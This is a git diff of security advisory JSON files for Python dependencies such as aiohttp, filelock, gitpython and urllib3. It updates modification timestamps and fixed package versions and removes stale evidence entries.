af3fa140f8b..020df9bea2a 100644 --- a/advisories/BREW-apm-CVE-2025-68146.json +++ b/advisories/BREW-apm-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-68146", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.1", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.4" + "resource_purl": "pkg:pypi/filelock@3.32.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", - "resource": "filelock" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", + "subject_version": "3.32.5", + "key": "pkg:pypi/filelock@3.32.5", "resource": "filelock" } ] diff --git a/advisories/BREW-apm-CVE-2025-69223.json b/advisories/BREW-apm-CVE-2025-69223.json index 9d2daafafe8..3aa734295e7 100644 --- a/advisories/BREW-apm-CVE-2025-69223.json +++ b/advisories/BREW-apm-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69223", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69224.json b/advisories/BREW-apm-CVE-2025-69224.json index f77480f4560..a88cee689f0 100644 --- a/advisories/BREW-apm-CVE-2025-69224.json +++ b/advisories/BREW-apm-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69224", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69225.json b/advisories/BREW-apm-CVE-2025-69225.json index ce42236340f..3250417df1c 100644 --- a/advisories/BREW-apm-CVE-2025-69225.json +++ b/advisories/BREW-apm-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69225", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69226.json b/advisories/BREW-apm-CVE-2025-69226.json index 2fdd94da0f0..1a8c6422372 100644 --- a/advisories/BREW-apm-CVE-2025-69226.json +++ b/advisories/BREW-apm-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69226", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69227.json b/advisories/BREW-apm-CVE-2025-69227.json index 1ba1bc6f951..7fc4ba405e5 100644 --- a/advisories/BREW-apm-CVE-2025-69227.json +++ b/advisories/BREW-apm-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69227", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69228.json b/advisories/BREW-apm-CVE-2025-69228.json index 017e37dc26c..899dd2ebc10 100644 --- a/advisories/BREW-apm-CVE-2025-69228.json +++ b/advisories/BREW-apm-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69228", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69229.json b/advisories/BREW-apm-CVE-2025-69229.json index 9b0eb650e34..9b0b7342968 100644 --- a/advisories/BREW-apm-CVE-2025-69229.json +++ b/advisories/BREW-apm-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69229", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-69230.json b/advisories/BREW-apm-CVE-2025-69230.json index a1a53466b44..89a092bea51 100644 --- a/advisories/BREW-apm-CVE-2025-69230.json +++ b/advisories/BREW-apm-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-69230", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-21226.json b/advisories/BREW-apm-CVE-2026-21226.json index f399b20bbef..39a0f12df53 100644 --- a/advisories/BREW-apm-CVE-2026-21226.json +++ b/advisories/BREW-apm-CVE-2026-21226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-21226", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-jm66-cg57-jjv5", "CVE-2026-21226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "azure-core", - "subject_version": "1.41.0", - "key": "pkg:pypi/azure-core@1.41.0", - "resource": "azure-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-21441.json b/advisories/BREW-apm-CVE-2026-21441.json index ee68182260b..bcd3cf4e3de 100644 --- a/advisories/BREW-apm-CVE-2026-21441.json +++ b/advisories/BREW-apm-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-21441", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-22701.json b/advisories/BREW-apm-CVE-2026-22701.json index ea2d73065ea..cbd187bb212 100644 --- a/advisories/BREW-apm-CVE-2026-22701.json +++ b/advisories/BREW-apm-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-22701", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.3", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.4" + "resource_purl": "pkg:pypi/filelock@3.32.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", - "resource": "filelock" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", + "subject_version": "3.32.5", + "key": "pkg:pypi/filelock@3.32.5", "resource": "filelock" } ] diff --git a/advisories/BREW-apm-CVE-2026-22815.json b/advisories/BREW-apm-CVE-2026-22815.json index 8819bfd29d3..8b409b9b652 100644 --- a/advisories/BREW-apm-CVE-2026-22815.json +++ b/advisories/BREW-apm-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-22815", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-25645.json b/advisories/BREW-apm-CVE-2026-25645.json index c940c342bd0..c888640ee8b 100644 --- a/advisories/BREW-apm-CVE-2026-25645.json +++ b/advisories/BREW-apm-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-25645", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-31236.json b/advisories/BREW-apm-CVE-2026-31236.json index a50967e289c..bd8dcaabde6 100644 --- a/advisories/BREW-apm-CVE-2026-31236.json +++ b/advisories/BREW-apm-CVE-2026-31236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-31236", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-03T08:46:00Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-g76p-4vg5-f4qh", "CVE-2026-31236", @@ -32,7 +32,7 @@ "fix": "bump", "range_state": "fixed", "resource": "llm", - "resource_purl": "pkg:pypi/llm@0.33" + "resource_purl": "pkg:pypi/llm@0.34" } } ], @@ -45,16 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "llm", - "subject_version": "0.33", - "key": "pkg:pypi/llm@0.33", - "resource": "llm" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "llm", - "subject_version": "0.33", - "key": "pkg:pypi/llm@0.33", + "subject_version": "0.34", + "key": "pkg:pypi/llm@0.34", "resource": "llm" } ] diff --git a/advisories/BREW-apm-CVE-2026-34513.json b/advisories/BREW-apm-CVE-2026-34513.json index 26041f36468..6cf82fdc36b 100644 --- a/advisories/BREW-apm-CVE-2026-34513.json +++ b/advisories/BREW-apm-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34513", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34514.json b/advisories/BREW-apm-CVE-2026-34514.json index 9dc43f2b544..37437d43588 100644 --- a/advisories/BREW-apm-CVE-2026-34514.json +++ b/advisories/BREW-apm-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34514", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34515.json b/advisories/BREW-apm-CVE-2026-34515.json index 932e4a5a55d..39ac6e32d47 100644 --- a/advisories/BREW-apm-CVE-2026-34515.json +++ b/advisories/BREW-apm-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34515", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34516.json b/advisories/BREW-apm-CVE-2026-34516.json index b07feb34622..cce648ad0d7 100644 --- a/advisories/BREW-apm-CVE-2026-34516.json +++ b/advisories/BREW-apm-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34516", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34517.json b/advisories/BREW-apm-CVE-2026-34517.json index 013f97c6c4d..dd205996122 100644 --- a/advisories/BREW-apm-CVE-2026-34517.json +++ b/advisories/BREW-apm-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34517", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34518.json b/advisories/BREW-apm-CVE-2026-34518.json index ee01d964a6b..62cc3c7b47d 100644 --- a/advisories/BREW-apm-CVE-2026-34518.json +++ b/advisories/BREW-apm-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34518", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34519.json b/advisories/BREW-apm-CVE-2026-34519.json index cc907a431f9..a39405d75c1 100644 --- a/advisories/BREW-apm-CVE-2026-34519.json +++ b/advisories/BREW-apm-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34519", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34520.json b/advisories/BREW-apm-CVE-2026-34520.json index e65236b6388..2f39dcd4696 100644 --- a/advisories/BREW-apm-CVE-2026-34520.json +++ b/advisories/BREW-apm-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34520", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34525.json b/advisories/BREW-apm-CVE-2026-34525.json index d1c8b28c8c9..34a932476d8 100644 --- a/advisories/BREW-apm-CVE-2026-34525.json +++ b/advisories/BREW-apm-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34525", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-34993.json b/advisories/BREW-apm-CVE-2026-34993.json index 20a58177a12..3fd36435863 100644 --- a/advisories/BREW-apm-CVE-2026-34993.json +++ b/advisories/BREW-apm-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-34993", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-42215.json b/advisories/BREW-apm-CVE-2026-42215.json index 54ce1e3daca..f1909562013 100644 --- a/advisories/BREW-apm-CVE-2026-42215.json +++ b/advisories/BREW-apm-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-42215", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.47", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-42284.json b/advisories/BREW-apm-CVE-2026-42284.json index 7fa075a0f89..920edab1ec3 100644 --- a/advisories/BREW-apm-CVE-2026-42284.json +++ b/advisories/BREW-apm-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-42284", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.47", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-44243.json b/advisories/BREW-apm-CVE-2026-44243.json index 1b3005c33cb..c807fee02ce 100644 --- a/advisories/BREW-apm-CVE-2026-44243.json +++ b/advisories/BREW-apm-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-44243", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.48", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-44244.json b/advisories/BREW-apm-CVE-2026-44244.json index 8c3328d5838..953ff8a10e6 100644 --- a/advisories/BREW-apm-CVE-2026-44244.json +++ b/advisories/BREW-apm-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-44244", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.49", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-44431.json b/advisories/BREW-apm-CVE-2026-44431.json index 6d2e4df240e..01198d7ba25 100644 --- a/advisories/BREW-apm-CVE-2026-44431.json +++ b/advisories/BREW-apm-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-44431", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-44432.json b/advisories/BREW-apm-CVE-2026-44432.json index c349910ea34..f90c91e5b58 100644 --- a/advisories/BREW-apm-CVE-2026-44432.json +++ b/advisories/BREW-apm-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-44432", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-44641.json b/advisories/BREW-apm-CVE-2026-44641.json index 5412baf6f1f..41ef7b85b0a 100644 --- a/advisories/BREW-apm-CVE-2026-44641.json +++ b/advisories/BREW-apm-CVE-2026-44641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-44641", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "CVE-2026-44641", "GHSA-xhrw-5qxx-jpwr", @@ -44,22 +44,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/microsoft/apm", - "subject_version": "0.29.0", + "subject_version": "0.30.0", "key": "https://github.com/microsoft/apm" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "apm-cli", - "subject_version": "0.29.0", - "key": "pkg:pypi/apm-cli@0.29.0" - }, - { - "strategy": "registry", - 